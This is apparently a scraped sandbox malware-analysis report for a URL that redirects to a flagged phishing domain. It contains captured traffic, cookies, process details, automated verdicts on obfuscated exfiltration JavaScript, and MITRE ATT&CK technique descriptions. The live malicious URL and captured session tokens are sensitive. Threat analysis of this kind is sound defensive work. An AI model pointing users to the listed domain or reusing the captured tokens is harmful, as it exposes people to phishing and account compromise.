2025-03-24 23:59:44 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 24 Mar 2025 23:59:44 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49712	35.190.80.1	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:44 UTC	521	OUT	POST /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 432 Content-Type: application/reports+json Origin: https://knig.rocaterma.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 23:59:44 UTC	432	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 6e 69 67 2e 72 6f 63 61 74 65 72 6d 61 2e 72 75 2f 6b 72 56 6b 47 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 34 2e 32 31 36 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f Data Ascii: [{"age":0,"body":{"elapsed_time":1028,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://knig.rocaterma.ru/krVkG/","sampling_fraction":1.0,"server_ip":"172.67.194.216","status_code":404,"type":"http.error"},"type":"network-erro
2025-03-24 23:59:44 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Mon, 24 Mar 2025 23:59:44 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49695	142.251.41.4	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:44 UTC	487	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CO6MywE= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 23:59:44 UTC	1303	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 23:59:44 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JwJPfktAcAPNdZ5pmi0Bxg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-24 23:59:44 UTC	1303	IN	Data Raw: 63 65 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 69 6e 63 65 6e 20 62 65 6e 65 66 69 63 69 61 6c 20 6f 77 6e 65 72 73 68 69 70 22 2c 22 70 6f 77 65 72 62 61 6c 6c 20 77 69 6e 6e 69 6e 67 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 22 2c 22 6e 62 61 22 2c 22 73 6f 6c 61 72 20 65 63 6c 69 70 73 65 22 2c 22 6e 65 77 6a 65 61 6e 73 20 68 69 61 74 75 73 22 2c 22 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 66 6f 72 65 63 61 73 74 22 2c 22 74 65 73 6c 61 20 73 74 6f 63 6b 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a Data Ascii: ce0)]}'["",["fincen beneficial ownership","powerball winning lottery numbers","apple iphone 17","nba","solar eclipse","newjeans hiatus","northern lights aurora borealis forecast","tesla stocks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":
2025-03-24 23:59:44 UTC	1303	IN	Data Raw: 56 4e 31 56 30 4e 48 55 77 57 6b 46 75 4d 33 41 35 61 47 4e 73 51 31 67 78 54 56 42 50 61 30 70 54 56 6b 52 6b 62 6b 4a 33 62 6d 63 72 52 30 73 31 63 58 64 76 56 54 52 51 5a 32 73 34 64 55 64 6f 4d 56 4e 75 56 33 46 55 57 45 59 31 52 6e 59 35 63 48 51 31 59 32 6f 7a 63 55 78 49 64 46 5a 33 61 33 4e 50 65 44 4a 71 4b 30 6c 54 64 79 74 30 53 58 6c 6a 52 6b 6c 4a 51 6e 68 75 52 32 5a 4a 61 6b 35 61 54 33 5a 51 4e 48 56 45 54 6a 6c 6f 52 6e 4e 77 56 56 70 54 63 56 4a 55 56 44 42 36 55 7a 68 54 61 32 46 33 51 30 68 4b 54 6e 5a 74 61 48 52 44 53 48 42 7a 52 6b 51 33 4b 33 68 4a 51 56 55 31 64 6c 64 72 63 58 64 50 51 6d 35 68 51 32 4e 6b 55 32 45 77 4d 6b 59 78 53 6c 5a 4d 5a 45 39 59 53 58 68 74 54 6c 56 4a 56 55 78 35 56 55 6c 4d 53 6b 56 45 56 6d 64 57 53 57 Data Ascii: VN1V0NHUwWkFuM3A5aGNsQ1gxTVBPa0pTVkRkbkJ3bmcrR0s1cXdvVTRQZ2s4dUdoMVNuV3FUWEY1RnY5cHQ1Y2ozcUxIdFZ3a3NPeDJqK0lTdyt0SXljRklJQnhuR2ZJak5aT3ZQNHVETjloRnNwVVpTcVJUVDB6UzhTa2F3Q0hKTnZtaHRDSHBzRkQ3K3hJQVU1dldrcXdPQm5hQ2NkU2EwMkYxSlZMZE9YSXhtTlVJVUx5VUlMSkVEVmdWSW
2025-03-24 23:59:44 UTC	697	IN	Data Raw: 5a 6c 4d 46 42 69 4e 55 56 45 56 6d 39 56 57 57 39 43 55 55 4e 6e 53 6e 70 54 55 7a 42 48 57 6b 35 6f 63 6d 4e 52 4d 6e 56 6b 51 57 56 70 63 33 46 58 63 6b 4e 6c 4d 46 56 42 56 57 64 75 63 47 74 71 53 47 35 56 5a 54 56 55 4d 6c 5a 4d 62 7a 42 35 56 47 4a 4f 59 6c 52 71 4d 56 64 53 5a 53 38 31 5a 33 56 71 59 6b 4e 4a 4e 33 56 73 54 48 68 31 57 56 4e 46 57 6c 4a 48 53 6a 4e 69 5a 58 6c 51 5a 6e 52 51 56 6e 4e 71 59 30 39 52 51 30 4e 50 55 6c 5a 6d 64 55 6c 4f 4e 58 46 76 64 56 42 36 4b 33 5a 78 56 44 6b 33 54 45 78 4d 57 57 59 33 61 32 56 4e 59 31 52 4d 4e 55 6c 72 54 58 46 7a 5a 48 68 30 65 6c 52 6b 62 32 74 53 4d 45 59 72 54 33 5a 44 4b 31 56 47 62 30 52 71 4d 32 64 52 56 47 6f 77 63 6e 68 31 63 57 4e 57 55 57 74 30 63 45 35 30 4f 48 5a 46 62 44 52 6d 56 Data Ascii: ZlMFBiNUVEVm9VWW9CUUNnSnpTUzBHWk5ocmNRMnVkQWVpc3FXckNlMFVBVWducGtqSG5VZTVUMlZMbzB5VGJOYlRqMVdSZS81Z3VqYkNJN3VsTHh1WVNFWlJHSjNiZXlQZnRQVnNqY09RQ0NPUlZmdUlONXFvdVB6K3ZxVDk3TExMWWY3a2VNY1RMNUlrTXFzZHh0elRkb2tSMEYrT3ZDK1VGb0RqM2dRVGowcnh1cWNWUWt0cE50OHZFbDRmV
2025-03-24 23:59:44 UTC	289	IN	Data Raw: 31 31 61 0d 0a 22 3a 5b 31 32 35 31 2c 31 32 35 30 2c 38 30 35 2c 38 30 34 2c 38 30 33 2c 38 30 32 2c 38 30 31 2c 38 30 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 Data Ascii: 11a":[1251,1250,805,804,803,802,801,800],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","ENTITY","Q
2025-03-24 23:59:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	19:59:24
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	19:59:30
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:59:36
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Source: 0.2..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://knig.rocaterma.ru/krVkG/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent.
Source: 0.4..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://knig.rocaterma.ru/krVkG/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.

Source: https://knig.rocaterma.ru/krVkG/	HTTP Parser: No favicon
Source: https://knig.rocaterma.ru/krVkG/	HTTP Parser: No favicon

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML

Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.163
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /krVkG/ HTTP/1.1Host: knig.rocaterma.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://knig.rocaterma.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: knig.rocaterma.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://knig.rocaterma.ru/krVkG/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnYiLCJtYWMiOiI4YzQyZDE4MDcyYmU5NmNiNTk3YzUwOGRkYjllOGNiMjA2N2I2MWI0MzJmODJjOWI2MzQ2NjdmZDNhMDFlODMxIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: nicholsoncop.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: nicholsoncop.com
Source: global traffic	DNS traffic detected: DNS query: knig.rocaterma.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://nicholsoncop.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 1308, Parent PID: 1052

General

File Activities

File Opened

File Created

File Deleted

File Moved

Windows Analysis Report
http://nicholsoncop.com/